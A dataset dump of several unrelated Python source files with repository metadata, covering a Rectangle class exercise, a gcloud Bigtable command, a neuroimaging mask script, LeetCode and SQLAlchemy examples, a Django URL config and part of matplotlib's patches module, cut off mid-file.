blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
defc4662ad24bac7f0c94489f4d8762a7b00ea29 | be7bb6d0cbdb27d3ff72830dc9cce41b170b27fe | /0x08-python-more_classes/7-rectangle.py | 07b740b4b98861329278958ae69a395ba2671045 | []
| no_license | camagar/holbertonschool-higher_level_programming | 21a8e7c2a2ad07c694c5443e174bb70502f910c2 | 97dd2fade6fb64ac7d9c52e412c0b8c1b8dfc3de | refs/heads/master | 2023-04-07T21:38:00.071687 | 2021-04-14T02:11:42 | 2021-04-14T02:11:42 | 291,889,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | #!/usr/bin/python3
"""create a class"""
class Rectangle(object):
"""define the rectangle class"""
number_of_instances = 0
print_symbol = "#"
def __init__(self, width=0, height=0):
self.width = width
self.height = height
Rectangle.number_of_instances += 1
@property
def width(self):
"""width"""
return self.__width
@property
def height(self):
"""height"""
return self.__height
@width.setter
def width(self, value):
"""width setter"""
if type(value) is not int:
raise TypeError('width must be an integer')
if value < 0:
raise ValueError('width must be >= 0')
self.__width = value
@height.setter
def height(self, value):
"""height setter"""
if type(value) is not int:
raise TypeError('height must be an integer')
if value < 0:
raise ValueError('height must be >= 0')
self.__height = value
def area(self):
"""area"""
a = self.__width * self.__height
return a
def perimeter(self):
"""Perimeter"""
if self.__width == 0 or self.__height == 0:
return 0
else:
p = (self.__width * 2) + (self.__height * 2)
return p
def __str__(self):
"""string method"""
print_rectangule = ""
if self.__width == 0 or self.__height == 0:
return print_rectangule
else:
for i in range(0, self.__height):
for j in range(0, self.__width):
print_rectangule += str(self.print_symbol)
if i != (self.__height - 1):
print_rectangule += "\n"
return print_rectangule
def __repr__(self):
"""representation"""
reptangle = 'Rectangle(' + str(self.__width) + ', ' +\
str(self.__height) + ')'
return (reptangle)
def __del__(self):
"""del instance"""
print("Bye rectangle...")
Rectangle.number_of_instances -= 1
| [
"[email protected]"
]
| |
4ca2f6e5a50c697732e41ef7847d7a9e32d0c8ef | d83fde3c891f44014f5339572dc72ebf62c38663 | /_bin/google-cloud-sdk/.install/.backup/lib/surface/bigtable/clusters/list.py | 22a4d818ffea8110f2f7395f31ce3f059c5b9a3d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
]
| permissive | gyaresu/dotfiles | 047cc3ca70f4b405ba272856c69ee491a79d2ebe | e5e533b3a081b42e9492b228f308f6833b670cfe | refs/heads/master | 2022-11-24T01:12:49.435037 | 2022-11-01T16:58:13 | 2022-11-01T16:58:13 | 17,139,657 | 1 | 1 | null | 2020-07-25T14:11:43 | 2014-02-24T14:59:59 | Python | UTF-8 | Python | false | false | 2,944 | py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""bigtable clusters list command."""
from __future__ import absolute_import
from __future__ import unicode_literals
from apitools.base.py import list_pager
from googlecloudsdk.api_lib.bigtable import util
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.bigtable import arguments
from googlecloudsdk.core import resources
def _GetUriFunction(resource):
return resources.REGISTRY.ParseRelativeName(
resource.name,
collection='bigtableadmin.projects.instances.clusters').SelfLink()
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class ListClusters(base.ListCommand):
"""List existing Bigtable clusters.
List existing Bigtable clusters.
## EXAMPLES
To list all clusters in an instance, run:
$ {command} --instances INSTANCE_NAME
To list all clusters in any of several instances, run:
$ {command} --instances INSTANCE_NAME1,INSTANCE_NAME2
"""
@staticmethod
def Args(parser):
"""Register flags for this command."""
arguments.AddInstancesResourceArg(parser, 'to list clusters for')
parser.display_info.AddFormat("""
table(
name.segment(3):sort=1:label=INSTANCE,
name.basename():sort=2:label=NAME,
location.basename():label=ZONE,
serveNodes:label=NODES,
defaultStorageType:label=STORAGE,
state
)
""")
parser.display_info.AddUriFunc(_GetUriFunction)
parser.display_info.AddCacheUpdater(arguments.InstanceCompleter)
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Yields:
Some value that we want to have printed later.
"""
cli = util.GetAdminClient()
instance_refs = args.CONCEPTS.instances.Parse()
if not args.IsSpecified('instances'):
instance_refs = [util.GetInstanceRef('-')]
for instance_ref in instance_refs:
msg = (
util.GetAdminMessages()
.BigtableadminProjectsInstancesClustersListRequest(
parent=instance_ref.RelativeName()))
for cluster in list_pager.YieldFromList(
cli.projects_instances_clusters,
msg,
field='clusters',
batch_size_attribute=None):
yield cluster
| [
"[email protected]"
]
| |
a109f4af2496f8cf2193422014e3bebe1bfb2884 | efd81a5e287a398aaa5333e949d6ca40b1544053 | /config/52_niak_centrality/00_gen_group_mask.py | 0070a89bd229cbbe1bfd58a95fbcfb6571a9160d | []
| no_license | fitrialif/abide-1 | 82d80bf52cd9b36072985a1ddeacfb325791566e | 9ccc45f612a58dbc3cf5fa3b70c41bcfeabd8ddc | refs/heads/master | 2020-04-25T15:13:22.974634 | 2014-03-10T18:18:42 | 2014-03-10T18:18:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,892 | py | #!/usr/bin/env python
from __future__ import print_function
import os, yaml
from os import path as op
def run(cmd):
print(cmd)
os.system(cmd)
# First read in a quick pack file with all the paths
fn = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/config/50_niak/quick_pack_run1_nofilt_noglobal.yml"
subinfo = yaml.load(open(fn, 'r'))
# Second extract path to masks in standard space
masks = [ si['functional_brain_mask_to_standard']['run1'] for si in subinfo ]
for mask in masks:
if not op.exists(mask):
print("missing: %s" % mask)
# Third combine the masks
cmd = "fslmerge -t combined_masks.nii.gz %s" % ' '.join(masks)
print(cmd, file=open("tmp.cmd", "w")) # for some reason, running it directly doesn't work
run("bash tmp.cmd")
# Fourth get a 90% and 100% masks
odir = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/templates/masks"
cmd = "fslmaths combined_masks.nii.gz -Tmean -thr 0.9 -bin %s/mask_niak_90percent.nii.gz" % odir
run(cmd)
cmd = "fslmaths combined_masks.nii.gz -Tmean -thr 1 -bin %s/mask_niak_100percent.nii.gz" % odir
run(cmd)
# Fifth get the grey matter mask into the same space as niak's data
odir = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/templates/masks"
cmd = "cd %s; 3dresample -input MNI152_T1_GREY_3mm_25pc_mask.nii.gz -master mask_niak_90percent.nii.gz -prefix MNI152_T1_GREY_3mm_25pc_mask_niak.nii.gz -rmode NN" % odir
run(cmd)
# Fifth combine that mask with the grey matter
odir = "/home2/data/Projects/ABIDE_Initiative/CPAC/abide/templates/masks"
cmd = "cd %s; fslmaths %s -mas %s %s" % (odir, "mask_niak_90percent.nii.gz", "MNI152_T1_GREY_3mm_25pc_mask_niak.nii.gz", "mask_niak_90percent_gm.nii.gz")
run(cmd)
cmd = "cd %s; fslmaths %s -mas %s %s" % (odir, "mask_niak_100percent.nii.gz", "MNI152_T1_GREY_3mm_25pc_mask_niak.nii.gz", "mask_niak_100percent_gm.nii.gz")
run(cmd)
| [
"[email protected]"
]
| |
1a084933a4396b2d4ac47a77e5b0c1463ab35b6f | 286a49d0360ee2eb718dd9a496be88555cef3227 | /229. 求众数 II.py | feeac888d4a69cfbebe04caeb6b8e78a73040e78 | []
| no_license | NaiveteYaYa/data-structrue | 0618ab6bb7accc99c40e39a3ca60bbc0a9723c2f | a376863c1a8e007efafd5c1ed84929a80321b1b9 | refs/heads/master | 2023-07-02T03:15:33.523855 | 2021-08-14T02:02:07 | 2021-08-14T02:02:07 | 395,857,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,043 | py | # -*- coding: utf-8 -*-
# @Time : 2020/4/2 14:20
# @Author : WuxieYaYa
"""
给定一个大小为 n 的数组,找出其中所有出现超过 ⌊ n/3 ⌋ 次的元素。
说明: 要求算法的时间复杂度为 O(n),空间复杂度为 O(1)。
示例 1:
输入: [3,2,3]
输出: [3]
示例 2:
输入: [1,1,1,3,3,2,2,2]
输出: [1,2]
链接:https://leetcode-cn.com/problems/majority-element-ii
摩尔投票法的简单理解
与169. 多数元素的两点区别:
“多数”是指超过n/3,不是n/2,因此最多会有两个元素是众数,要建立两个candidate
题目没保证多数元素一定存在,所以最后要对candidate进行检验。因此整个流程分为两步:step1投票阶段,step2检验阶段。
算法核心:
对于候选者cand1和cand2:
如果投cand1,cand1加一票。
如果投cand2,cand2加一票。
如果投其他元素,cand1和cand2各减一票。
理解方法:
在169. 多数元素中,
如果candidate是多数元素,那么多数元素(>n/2)与其他元素之和(< n/2)对抗,一定赢。
如果candidate不是多数元素,那么该元素(< n/2)与多数元素和其他元素之和(>n/2)对抗,一定会被打败。
本题中,分为A``B``others三个阵营
如果此刻candidate是A和B,那么A(>n/3)与others(<n/3)对抗稳赢,B(>n/3)与others(<n/3)对抗稳赢。
如果此刻candidate是A和C(C来自others),那么B``C一定是对抗不了B的。
时间复杂度O(n),空间复杂度O(1)
作者:coldme-2
链接:https://leetcode-cn.com/problems/majority-element-ii/solution/mo-er-tou-piao-fa-de-jian-dan-li-jie-by-coldme-2/
"""
def majorityElement(nums):
# cand1, vote1 = None, 0
# cand2, vote2 = None, 0
# for i in range(len(nums)):
# if cand1 is None and cand2 != nums[i]:
# cand1 = nums[i]
# vote1 += 1
#
# elif cand2 is None and cand1 != nums[i]:
# cand2 = nums[i]
# vote2 += 1
#
# else:
# if cand1 == nums[i]:
# vote1 += 1
#
# elif cand2 == nums[i]:
# vote2 += 1
#
# else:
# vote1 -= 1
# vote2 -= 1
# if vote1 == 0:
# cand1 = None
# if vote2 == 0:
# cand2 = None
#
#
# vote1, vote2 = 0, 0
# for num in nums:
# if num == cand1:
# vote1 += 1
# if num == cand2:
# vote2 += 1
#
# ans = []
# if vote1> len(nums)//3:
# ans.append(cand1)
# if vote2 > len(nums)//3:
# ans.append(cand2)
#
# return ans
# 利用列表性质。
n = len(nums)
ans = []
for i in set(nums):
if nums.count(i) > n//3:
ans.append(i)
return ans
if __name__ == '__main__':
print(majorityElement([1,1,1,3,3,2,2,2]))
| [
"[email protected]"
]
| |
9b4bfa3a8c824efe83f17773632977134e891853 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/40/usersdata/68/18502/submittedfiles/main.py | 9b3141f2cb1df838fab5b35110951b9ec577eca6 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,041 | py | # -*- coding: utf-8 -*-
from __future__ import division
import funcoes
#COMECE AQUI
def fatorial (m):
m_fat=1
for i in range (2,m+1,1):
m_fat=m_fat * i
return m_fat
m=int(input('Digite m:'))
e=input('Digite o epsilon para o cosseno:')
#DOUBLE CALCULA_VALOR_ABSOLUTO:
if m<0:
m=m*(-1)
#DOUBLE CALCULA_PI:
soma_pi=0
j=2
for i in range (0,m,1):
if i%2==0:
soma_pi=soma_pi+(4/(j*(j+1)*(j+2)))
else:
soma_pi=soma_pi-(4/(j*(j+1)*(j+2)))
j=j+2
pi=3+soma_pi
#DOUBLE CALCULA_CO_SENO:
soma_cosseno=0
i=1
j=2
#CHAMAR A SEGUNDA PARTE DA SOMA_COSSENO DE UMA VARIÁVEL:
'''
a= (((pi/5)**j)/fatorial(j)) e a repetição só iria acontecer enquanto a fosse menor ou igual a epsilon
'''
a=(((pi/5)**j)/fatorial (j))
while a>=e:
if i%2!=0:
soma_cosseno = soma_cosseno + a
else:
soma_cosseno = soma_cosseno - a
j=j+2
i=i+1
cosseno=1-soma_cosseno
#DOUBLE CALCULA_RAZAO_AUREA_:
razaoAurea= 2*cosseno
print('%.15f' %pi)
print('%.15f' %razaoAurea) | [
"[email protected]"
]
| |
5e8e3c2e021324492b3bddcc3682d341a0a778d6 | 4946fa19e840aafb7b3ed4ae159764af44c0ff34 | /pages/urls.py | fd2b01a536ecda7eb1db9d3615cd50bf4701a964 | []
| no_license | palmman/pedshop | c804be2fa8d1a7ce49c86c433a9bb00731146811 | 74aa002272e286e220e1e66fb701209ce9a055a6 | refs/heads/main | 2023-04-18T00:10:59.525763 | 2021-04-28T05:51:38 | 2021-04-28T05:51:38 | 362,352,612 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('shop', views.shop, name='shop'),
path('about', views.about, name='about'),
path('contact', views.contact, name='contact'),
path('<int:id>', views.product, name='product'),
path('category/<slug:pages_slug>/', views.shop, name='products_by_category'),
]
| [
"[email protected]"
]
| |
912d1cc8bfd900d2efb1333cf76904f99bd70ae4 | e34cbf5fce48f661d08221c095750240dbd88caf | /python/day42_sqlalchemy/4.0.scoped_session.py | b723853a14b95b576bc03df5c3d1d10b7857df60 | []
| no_license | willianflasky/growup | 2f994b815b636e2582594375e90dbcb2aa37288e | 1db031a901e25bbe13f2d0db767cd28c76ac47f5 | refs/heads/master | 2023-01-04T13:13:14.191504 | 2020-01-12T08:11:41 | 2020-01-12T08:11:41 | 48,899,304 | 2 | 0 | null | 2022-12-26T19:46:22 | 2016-01-02T05:04:39 | C | UTF-8 | Python | false | false | 1,295 | py | #!/usr/bin/env python
# -*-coding:utf8-*-
# date: 2018/2/23 上午11:45
__author__ = "willian"
import time
import threading
import datetime
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, ForeignKey, UniqueConstraint, Index
from sqlalchemy.orm import sessionmaker, relationship, scoped_session
from sqlalchemy import create_engine
from sqlalchemy.sql import text
engine = create_engine("mysql+pymysql://s6:[email protected]:3306/s6", max_overflow=0, pool_size=5)
Session = sessionmaker(bind=engine)
# 方式一: 由于无法提供线程共享功能,所以在开发时要注意,在每个线程中自己创建session.
# 自己具有操作数据库的 close commit execute...方法
# session = Session()
# session.close()
# 方式二: scoped_session 支持线程安全,为每个线程创建一个session
# - threading.Local
# - 唯一标识
# 源码剖析 第一步:command+单击
session = scoped_session(Session)
session.remove()
"""
session = scoped_session(Session)
session中两个值
1. self.session_factory
2. self.registry 中又有两个值, 加括号创建session
1> self.registry.self.session_factory(createfunc)
2> self.registry.self.registry(没有写错)
""" | [
"[email protected]"
]
| |
2a29dc528d6fecc104cb427a3bf075c0acb82089 | c2df9e04adec78e789d1fbdb0711c45e5b9263a7 | /venv/Lib/site-packages/matplotlib/patches.py | 9cbba65bbb9b007fbf470b1681f317385db6d8e6 | [
"MIT",
"BSD-3-Clause"
]
| permissive | AdarshSai/Final_Project | 433009a2f416e894ee3be85cd9317cb8e8df5516 | f966834ca72dd232102ed500ef47ef2b3bdbed5b | refs/heads/main | 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 | MIT | 2020-11-19T22:24:17 | 2020-10-31T14:19:58 | Python | UTF-8 | Python | false | false | 153,320 | py | import contextlib
import functools
import inspect
import math
from numbers import Number
import textwrap
import numpy as np
import matplotlib as mpl
from . import artist, cbook, colors, docstring, lines as mlines, transforms
from .bezier import (
NonIntersectingPathException, get_cos_sin, get_intersection,
get_parallels, inside_circle, make_wedged_bezier2,
split_bezier_intersecting_with_closedpath, split_path_inout)
from .path import Path
@cbook._define_aliases({
"antialiased": ["aa"],
"edgecolor": ["ec"],
"facecolor": ["fc"],
"linestyle": ["ls"],
"linewidth": ["lw"],
})
class Patch(artist.Artist):
"""
A patch is a 2D artist with a face color and an edge color.
If any of *edgecolor*, *facecolor*, *linewidth*, or *antialiased*
are *None*, they default to their rc params setting.
"""
zorder = 1
validCap = mlines.Line2D.validCap
validJoin = mlines.Line2D.validJoin
# Whether to draw an edge by default. Set on a
# subclass-by-subclass basis.
_edge_default = False
def __init__(self,
edgecolor=None,
facecolor=None,
color=None,
linewidth=None,
linestyle=None,
antialiased=None,
hatch=None,
fill=True,
capstyle=None,
joinstyle=None,
**kwargs):
"""
The following kwarg properties are supported
%(Patch)s
"""
artist.Artist.__init__(self)
if linewidth is None:
linewidth = mpl.rcParams['patch.linewidth']
if linestyle is None:
linestyle = "solid"
if capstyle is None:
capstyle = 'butt'
if joinstyle is None:
joinstyle = 'miter'
if antialiased is None:
antialiased = mpl.rcParams['patch.antialiased']
self._hatch_color = colors.to_rgba(mpl.rcParams['hatch.color'])
self._fill = True # needed for set_facecolor call
if color is not None:
if edgecolor is not None or facecolor is not None:
cbook._warn_external(
"Setting the 'color' property will override "
"the edgecolor or facecolor properties.")
self.set_color(color)
else:
self.set_edgecolor(edgecolor)
self.set_facecolor(facecolor)
# unscaled dashes. Needed to scale dash patterns by lw
self._us_dashes = None
self._linewidth = 0
self.set_fill(fill)
self.set_linestyle(linestyle)
self.set_linewidth(linewidth)
self.set_antialiased(antialiased)
self.set_hatch(hatch)
self.set_capstyle(capstyle)
self.set_joinstyle(joinstyle)
if len(kwargs):
self.update(kwargs)
def get_verts(self):
"""
Return a copy of the vertices used in this patch.
If the patch contains Bezier curves, the curves will be interpolated by
line segments. To access the curves as curves, use `get_path`.
"""
trans = self.get_transform()
path = self.get_path()
polygons = path.to_polygons(trans)
if len(polygons):
return polygons[0]
return []
def _process_radius(self, radius):
if radius is not None:
return radius
if isinstance(self._picker, Number):
_radius = self._picker
else:
if self.get_edgecolor()[3] == 0:
_radius = 0
else:
_radius = self.get_linewidth()
return _radius
def contains(self, mouseevent, radius=None):
"""
Test whether the mouse event occurred in the patch.
Returns
-------
(bool, empty dict)
"""
inside, info = self._default_contains(mouseevent)
if inside is not None:
return inside, info
radius = self._process_radius(radius)
codes = self.get_path().codes
if codes is not None:
vertices = self.get_path().vertices
# if the current path is concatenated by multiple sub paths.
# get the indexes of the starting code(MOVETO) of all sub paths
idxs, = np.where(codes == Path.MOVETO)
# Don't split before the first MOVETO.
idxs = idxs[1:]
subpaths = map(
Path, np.split(vertices, idxs), np.split(codes, idxs))
else:
subpaths = [self.get_path()]
inside = any(
subpath.contains_point(
(mouseevent.x, mouseevent.y), self.get_transform(), radius)
for subpath in subpaths)
return inside, {}
def contains_point(self, point, radius=None):
"""
Return whether the given point is inside the patch.
Parameters
----------
point : (float, float)
The point (x, y) to check, in target coordinates of
``self.get_transform()``. These are display coordinates for patches
that are added to a figure or axes.
radius : float, optional
Add an additional margin on the patch in target coordinates of
``self.get_transform()``. See `.Path.contains_point` for further
details.
Returns
-------
bool
Notes
-----
The proper use of this method depends on the transform of the patch.
Isolated patches do not have a transform. In this case, the patch
creation coordinates and the point coordinates match. The following
example checks that the center of a circle is within the circle
>>> center = 0, 0
>>> c = Circle(center, radius=1)
>>> c.contains_point(center)
True
The convention of checking against the transformed patch stems from
the fact that this method is predominantly used to check if display
coordinates (e.g. from mouse events) are within the patch. If you want
to do the above check with data coordinates, you have to properly
transform them first:
>>> center = 0, 0
>>> c = Circle(center, radius=1)
>>> plt.gca().add_patch(c)
>>> transformed_center = c.get_transform().transform(center)
>>> c.contains_point(transformed_center)
True
"""
radius = self._process_radius(radius)
return self.get_path().contains_point(point,
self.get_transform(),
radius)
def contains_points(self, points, radius=None):
"""
Return whether the given points are inside the patch.
Parameters
----------
points : (N, 2) array
The points to check, in target coordinates of
``self.get_transform()``. These are display coordinates for patches
that are added to a figure or axes. Columns contain x and y values.
radius : float, optional
Add an additional margin on the patch in target coordinates of
``self.get_transform()``. See `.Path.contains_point` for further
details.
Returns
-------
length-N bool array
Notes
-----
The proper use of this method depends on the transform of the patch.
See the notes on `.Patch.contains_point`.
"""
radius = self._process_radius(radius)
return self.get_path().contains_points(points,
self.get_transform(),
radius)
def update_from(self, other):
# docstring inherited.
artist.Artist.update_from(self, other)
# For some properties we don't need or don't want to go through the
# getters/setters, so we just copy them directly.
self._edgecolor = other._edgecolor
self._facecolor = other._facecolor
self._original_edgecolor = other._original_edgecolor
self._original_facecolor = other._original_facecolor
self._fill = other._fill
self._hatch = other._hatch
self._hatch_color = other._hatch_color
# copy the unscaled dash pattern
self._us_dashes = other._us_dashes
self.set_linewidth(other._linewidth) # also sets dash properties
self.set_transform(other.get_data_transform())
# If the transform of other needs further initialization, then it will
# be the case for this artist too.
self._transformSet = other.is_transform_set()
def get_extents(self):
"""
Return the `Patch`'s axis-aligned extents as a `~.transforms.Bbox`.
"""
return self.get_path().get_extents(self.get_transform())
def get_transform(self):
"""Return the `~.transforms.Transform` applied to the `Patch`."""
return self.get_patch_transform() + artist.Artist.get_transform(self)
def get_data_transform(self):
"""
Return the `~.transforms.Transform` mapping data coordinates to
physical coordinates.
"""
return artist.Artist.get_transform(self)
def get_patch_transform(self):
"""
Return the `~.transforms.Transform` instance mapping patch coordinates
to data coordinates.
For example, one may define a patch of a circle which represents a
radius of 5 by providing coordinates for a unit circle, and a
transform which scales the coordinates (the patch coordinate) by 5.
"""
return transforms.IdentityTransform()
def get_antialiased(self):
"""Return whether antialiasing is used for drawing."""
return self._antialiased
def get_edgecolor(self):
"""Return the edge color."""
return self._edgecolor
def get_facecolor(self):
"""Return the face color."""
return self._facecolor
def get_linewidth(self):
"""Return the line width in points."""
return self._linewidth
def get_linestyle(self):
"""Return the linestyle."""
return self._linestyle
def set_antialiased(self, aa):
"""
Set whether to use antialiased rendering.
Parameters
----------
b : bool or None
"""
if aa is None:
aa = mpl.rcParams['patch.antialiased']
self._antialiased = aa
self.stale = True
def _set_edgecolor(self, color):
set_hatch_color = True
if color is None:
if (mpl.rcParams['patch.force_edgecolor'] or
not self._fill or self._edge_default):
color = mpl.rcParams['patch.edgecolor']
else:
color = 'none'
set_hatch_color = False
self._edgecolor = colors.to_rgba(color, self._alpha)
if set_hatch_color:
self._hatch_color = self._edgecolor
self.stale = True
def set_edgecolor(self, color):
"""
Set the patch edge color.
Parameters
----------
color : color or None or 'auto'
"""
self._original_edgecolor = color
self._set_edgecolor(color)
def _set_facecolor(self, color):
if color is None:
color = mpl.rcParams['patch.facecolor']
alpha = self._alpha if self._fill else 0
self._facecolor = colors.to_rgba(color, alpha)
self.stale = True
def set_facecolor(self, color):
"""
Set the patch face color.
Parameters
----------
color : color or None
"""
self._original_facecolor = color
self._set_facecolor(color)
def set_color(self, c):
"""
Set both the edgecolor and the facecolor.
Parameters
----------
c : color
See Also
--------
Patch.set_facecolor, Patch.set_edgecolor
For setting the edge or face color individually.
"""
self.set_facecolor(c)
self.set_edgecolor(c)
def set_alpha(self, alpha):
# docstring inherited
super().set_alpha(alpha)
self._set_facecolor(self._original_facecolor)
self._set_edgecolor(self._original_edgecolor)
# stale is already True
def set_linewidth(self, w):
"""
Set the patch linewidth in points.
Parameters
----------
w : float or None
"""
if w is None:
w = mpl.rcParams['patch.linewidth']
if w is None:
w = mpl.rcParams['axes.linewidth']
self._linewidth = float(w)
# scale the dash pattern by the linewidth
offset, ls = self._us_dashes
self._dashoffset, self._dashes = mlines._scale_dashes(
offset, ls, self._linewidth)
self.stale = True
def set_linestyle(self, ls):
"""
Set the patch linestyle.
=========================== =================
linestyle description
=========================== =================
``'-'`` or ``'solid'`` solid line
``'--'`` or ``'dashed'`` dashed line
``'-.'`` or ``'dashdot'`` dash-dotted line
``':'`` or ``'dotted'`` dotted line
=========================== =================
Alternatively a dash tuple of the following form can be provided::
(offset, onoffseq)
where ``onoffseq`` is an even length tuple of on and off ink in points.
Parameters
----------
ls : {'-', '--', '-.', ':', '', (offset, on-off-seq), ...}
The line style.
"""
if ls is None:
ls = "solid"
self._linestyle = ls
# get the unscaled dash pattern
offset, ls = self._us_dashes = mlines._get_dash_pattern(ls)
# scale the dash pattern by the linewidth
self._dashoffset, self._dashes = mlines._scale_dashes(
offset, ls, self._linewidth)
self.stale = True
def set_fill(self, b):
"""
Set whether to fill the patch.
Parameters
----------
b : bool
"""
self._fill = bool(b)
self._set_facecolor(self._original_facecolor)
self._set_edgecolor(self._original_edgecolor)
self.stale = True
def get_fill(self):
"""Return whether the patch is filled."""
return self._fill
# Make fill a property so as to preserve the long-standing
# but somewhat inconsistent behavior in which fill was an
# attribute.
fill = property(get_fill, set_fill)
def set_capstyle(self, s):
"""
Set the capstyle.
Parameters
----------
s : {'butt', 'round', 'projecting'}
"""
mpl.rcsetup.validate_capstyle(s)
self._capstyle = s
self.stale = True
def get_capstyle(self):
"""Return the capstyle."""
return self._capstyle
def set_joinstyle(self, s):
"""
Set the joinstyle.
Parameters
----------
s : {'miter', 'round', 'bevel'}
"""
mpl.rcsetup.validate_joinstyle(s)
self._joinstyle = s
self.stale = True
def get_joinstyle(self):
"""Return the joinstyle."""
return self._joinstyle
def set_hatch(self, hatch):
r"""
Set the hatching pattern.
*hatch* can be one of::
/ - diagonal hatching
\ - back diagonal
| - vertical
- - horizontal
+ - crossed
x - crossed diagonal
o - small circle
O - large circle
. - dots
* - stars
Letters can be combined, in which case all the specified
hatchings are done. If same letter repeats, it increases the
density of hatching of that pattern.
Hatching is supported in the PostScript, PDF, SVG and Agg
backends only.
Parameters
----------
hatch : {'/', '\\', '|', '-', '+', 'x', 'o', 'O', '.', '*'}
"""
self._hatch = hatch
self.stale = True
def get_hatch(self):
"""Return the hatching pattern."""
return self._hatch
@contextlib.contextmanager
def _bind_draw_path_function(self, renderer):
"""
``draw()`` helper factored out for sharing with `FancyArrowPatch`.
Yields a callable ``dp`` such that calling ``dp(*args, **kwargs)`` is
equivalent to calling ``renderer1.draw_path(gc, *args, **kwargs)``
where ``renderer1`` and ``gc`` have been suitably set from ``renderer``
and the artist's properties.
"""
renderer.open_group('patch', self.get_gid())
gc = renderer.new_gc()
gc.set_foreground(self._edgecolor, isRGBA=True)
lw = self._linewidth
if self._edgecolor[3] == 0:
lw = 0
gc.set_linewidth(lw)
gc.set_dashes(self._dashoffset, self._dashes)
gc.set_capstyle(self._capstyle)
gc.set_joinstyle(self._joinstyle)
gc.set_antialiased(self._antialiased)
self._set_gc_clip(gc)
gc.set_url(self._url)
gc.set_snap(self.get_snap())
gc.set_alpha(self._alpha)
if self._hatch:
gc.set_hatch(self._hatch)
gc.set_hatch_color(self._hatch_color)
if self.get_sketch_params() is not None:
gc.set_sketch_params(*self.get_sketch_params())
if self.get_path_effects():
from matplotlib.patheffects import PathEffectRenderer
renderer = PathEffectRenderer(self.get_path_effects(), renderer)
# In `with _bind_draw_path_function(renderer) as draw_path: ...`
# (in the implementations of `draw()` below), calls to `draw_path(...)`
# will occur as if they took place here with `gc` inserted as
# additional first argument.
yield functools.partial(renderer.draw_path, gc)
gc.restore()
renderer.close_group('patch')
self.stale = False
@artist.allow_rasterization
def draw(self, renderer):
# docstring inherited
if not self.get_visible():
return
# Patch has traditionally ignored the dashoffset.
with cbook._setattr_cm(self, _dashoffset=0), \
self._bind_draw_path_function(renderer) as draw_path:
path = self.get_path()
transform = self.get_transform()
tpath = transform.transform_path_non_affine(path)
affine = transform.get_affine()
draw_path(tpath, affine,
# Work around a bug in the PDF and SVG renderers, which
# do not draw the hatches if the facecolor is fully
# transparent, but do if it is None.
self._facecolor if self._facecolor[3] else None)
def get_path(self):
"""Return the path of this patch."""
raise NotImplementedError('Derived must override')
def get_window_extent(self, renderer=None):
return self.get_path().get_extents(self.get_transform())
def _convert_xy_units(self, xy):
"""Convert x and y units for a tuple (x, y)."""
x = self.convert_xunits(xy[0])
y = self.convert_yunits(xy[1])
return x, y
patchdoc = artist.kwdoc(Patch)
for k in ['Rectangle', 'Circle', 'RegularPolygon', 'Polygon', 'Wedge', 'Arrow',
'FancyArrow', 'CirclePolygon', 'Ellipse', 'Arc', 'FancyBboxPatch',
'Patch']:
docstring.interpd.update({k: patchdoc})
# define Patch.__init__ docstring after the class has been added to interpd
docstring.dedent_interpd(Patch.__init__)
class Shadow(Patch):
def __str__(self):
return "Shadow(%s)" % (str(self.patch))
@cbook._delete_parameter("3.3", "props")
@docstring.dedent_interpd
def __init__(self, patch, ox, oy, props=None, **kwargs):
"""
Create a shadow of the given *patch*.
By default, the shadow will have the same face color as the *patch*,
but darkened.
Parameters
----------
patch : `.Patch`
The patch to create the shadow for.
ox, oy : float
